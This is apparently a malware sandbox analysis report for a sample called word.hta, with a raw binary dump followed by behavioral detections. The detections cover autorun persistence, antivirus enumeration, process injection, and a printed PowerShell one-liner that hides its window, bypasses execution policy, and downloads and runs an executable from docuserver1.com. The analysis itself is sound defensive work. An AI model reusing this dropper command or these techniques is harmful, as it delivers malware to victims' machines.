tq@D$PWÿpq@jUUÿt$ ÿt$ Uÿ5x6Bÿq@UÿvèÕÿÿ9-l6Bu\jÿ5x6Bÿ`r@hèÃëÿ5x6Bÿèq@ÿ5høA-¨>BWÿlq@9- Bu9-x6Btj Wÿ`r@Ç B3À_^][ÄÂ|$xuÿl6Bjÿt$hÿ5¨>BÿDr@Âÿt$jèePD$èPÿt$èÎÂÿt$ÿ5Bÿ<r@Âjÿt$j(ÿ5¨>BÿDr@Â¡x6BÀtjjÿt$PÿDr@ÂUììEVÍþÿÿøjëÿuÿq@ðöt}öFW=q@tPÿ×öFt PÿuÿTp@ÿvÿuÿPp@FöFEøtPÿ×EøöF_t Pÿuÿ<p@öFt!FEôFÀtPÿDp@EôPÿHp@FFë3À^ÉÂUìE dôAÿuÈQÿuÿ¼p@ÿuè-MdôA3À]ÂUìì}SVW ]{0ÿ} |6B½+È9¡Ø>Bÿs4øj"¾ECÿueøðG÷ÖÁîæà}ôÇEü,@@ðèLþÿÿÿs8j#ÿuè?þÿÿ3ÀjöÀ Pÿuÿq@VèCþÿÿhèÿuÿ,r@ØSè@þÿÿ5Dr@jjh[SÿÖ¡°>B@hÀ} ÷ØPÿq@PjhCSÿÖhjhESÿÖ%dôAWè!Pjh5SÿÖEôPÿuhISÿÖ%B3Àéa},r@5Dr@uZEÁèfÀ.3À9B püAyö PPhðh ÿuÿÓPÿÖàáþPÈèMýÿÿèù}NÊhèÿuÿÓ}uruiOWMø+ÊùUôÇEü@.BsLMôQjhKPÿÖ=q@hjÿ×q@PÿÓjjjÿuühä@ÿuÿ\q@hjÿ×PÿÓ}uKuB ujjhÿ5¨>BÿÖujjjÿ5¨>BÿÖ3À@ë}uÿB}Wÿuÿuèüÿÿ_^[ÉÂ=,?B¡`ôAu¡BjjhôPÿDr@ÃUì}Vuu&ÿv0jÿuèìûÿÿF<Áà @BPhèÿuèÀVÿuÿuè.üÿÿ^]ÂUììH¡püASVEàp<@8Áæ Æ@B}WEü»ûu VSè}Vè4}ur}SWÿ,r@VEøèÀtVè2ÀuVèV=x6Bÿuøÿôq@Eÿp4jWè5ûÿÿEÿp0jWè'ûÿÿÿuøèTûÿÿjèÀnjÿuøÿÐ}Ï·E;ÃuMÁéfùAÇE=é¤j3ÀY}¼ÿuüó«E¿ BhpøAE¸}ÀÇEÌF@uÐèEÄE¸PÇEÈAÿTq@ÀtVPÿxr@Vè¾¡°>BÀt(þBu PjèÎW¿@.BWÿðp@ÀtWVè°ÿBVSÿuè#ëÇE}t }ueüeøVSèûVè$ÀuÇEü¿hôAVWè93ÛSèS;ÃEôt53À;Çt-EäPEìPEØPWÿUôÀulÛtf!Wè=ØK;ßfÇ\uÓ3ÛVWèîWèo;Ãt EÜPEôPEèPEðPWÿÀp@Àt:Eð¾¯EèVÿuôPÿ0q@øÇEøë }ØEÜ¬Ç Áè ÇEø3Ûë}¾jè½9]øt;øsÇEü |6B9Yt+Pjûhÿèà9]øtWjüVèÒëhXôAVÿuèÖ Eü;Ã£D?Bu jèÉÍÿÿEüEàpt]ü3À9]üÀPèÜøÿÿ9]üu 9Buè{üÿÿBÿuÿuÿuèûøÿÿ_^[ÉÂUì}V5Dr@uÿuhûèc ÿujhfÿuÿÖ}u-ÿuÿuÿPq@Àtjè7ÍÿÿÀu@ë3ÀPjheÿuÿÖ3À^]ÂUìì@SVuWjþ_jÜ[sj _jÝ[þsjÞ3ÿ[þ33ÿÿs3ÀÏ@jÓàY÷ùðEàjßPèHPEÀSPè=PÆ%ÿÿÿÏj 3ÒÀÓèY÷ñÏÓîRVhì@¾ BÿuVèVøèøøWÿr@ÄVÿuÿ5x6Bèf_^[ÉÂÌ>B È>B3ÀÒtVöAtt$±ÁJuê^ÂUìì8V5Dr@W}jj h WÿÖ}t<ÿ q@¿ÈÁè¿ÀEôEðPWMðÿpq@EðPjhWÿÖöEøfuÈÿëEüEÌEÈPjhWÇEÈÿÖEì_^ÉÂUììPSV5,r@WhùÿuÿÖhEøÿuÿÖÈ>B5Dr@Eü¡°>B3ÿ}]äEð"Ej£?B¡Ì>B[}èÁàPj@]ôÿq@jn£Bÿ5 >Bÿ¤q@ BÿhTN@jüEìÿuüÿ0r@Wjj!jj£Bÿ4p@hÿÿ£|BÿuìPÿ(p@ÿ5|BSh ÿuüÿÖWWhÿuüÿÖø} WjhÿuüÿÖÿuìÿDp@3ÛEð;Çt'û t}ôPWèPWhCÿuøÿÖSPhQÿuøÿÖCû!|É}]ôÿt0jÿuèuõÿÿÿt4jÿuègõÿÿ3ÿ3Û9=Ì>BÄEäPUìB8EÈj ÐY]°#ÑÇE´ÿÿ¨ÇE¸ MÄ}ÜUÀt8E°ÇE¸MPjhÇEØÿuüÿÖ BÇEè¹¡B¸ë.¨tSjh ÿuüÿÖØëE°PjhÿuüÿÖ B¹UìGÂ;=Ì>BUìKÿÿÿ}èujðÿuüÿq@$ûPjðÿuüÿ0r@}ôujÿuøÿ`r@ÿuøèôÿÿéÿuüèôÿÿ]ä3ÿ}u3É}AÇEMëM}N¸t 9Eç9EMôt yÒö¹>Buv9Et Myþuh3É9EÁQÿuüèüÿÿ;Ç|SÈiÉT öÁu@öÁ@tñÉyÉëáþëñP è Æÿÿ¡¸>B3É÷ÐAÇEÁè#ÁME9}ôtNEôxnþÿÿuÿp\WhÿuüÿÖEôxjþÿÿu(xu@\iÀD ë@\iÀ\

Poweshell is sending data to a remote host (1 event)

Data sent

GET /d/doc.exe HTTP/1.1 Host: docuserver1.com Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 24, 2021, 7:41 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Potentially malicious URLs were found in the process memory dump (1 event)

url	http://nsis.sf.net/NSIS_Error

Yara rule detected in process memory (18 events)

description	Escalate priviledges	rule	Escalate_priviledges
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:4356 CREDAT:145409

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe

reg_value

C:\Users\test22\AppData\Roaming\Temp\word.exe

Executes one or more WMI queries (1 event)

wmi	Select * from AntiVirusProduct

A command shell or script process was created by an unexpected parent process (1 event)

parent_process

iexplore.exe

martian_process

powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://docuserver1.com/d/doc.exe',$env:Temp+'\EJNFTE.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\EJNFTE.Exe')

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send June 24, 2021, 7:41 p.m.	buffer: GET /d/doc.exe HTTP/1.1 Host: docuserver1.com Connection: Keep-Alive socket: 1260 sent: 74	1	74	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2508 called NtSetContextThread to modify thread in remote process 8248
NtSetContextThread June 24, 2021, 7:42 p.m.	registers.eip: 2000355780 registers.esp: 1638384 registers.edi: 0 registers.eax: 4353015 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000018c process_identifier: 8248	1	0	0

One or more non-whitelisted processes were created (4 events)

parent_process	iexplore.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://docuserver1.com/d/doc.exe',$env:Temp+'\EJNFTE.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\EJNFTE.Exe')
parent_process	iexplore.exe	martian_process	powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://docuserver1.com/d/doc.exe',$env:Temp+'\EJNFTE.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\EJNFTE.Exe')
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe"

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 4356 resumed a thread in remote process 9076
Process injection	Process 4024 resumed a thread in remote process 2508
NtResumeThread June 24, 2021, 7:41 p.m.	thread_handle: 0x0000000000000360 suspend_count: 1 process_identifier: 9076	1	0	0
NtResumeThread June 24, 2021, 7:42 p.m.	thread_handle: 0x000000000000066c suspend_count: 1 process_identifier: 2508	1	0	0

Creates a suspicious Powershell process (6 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-w hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-w hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line

The process powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (6 events)

dead_host	192.168.56.102:49824
dead_host	3.14.182.203:19080
dead_host	192.168.56.102:49830
dead_host	192.168.56.102:49828
dead_host	192.168.56.102:49822
dead_host	192.168.56.102:49826

word.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All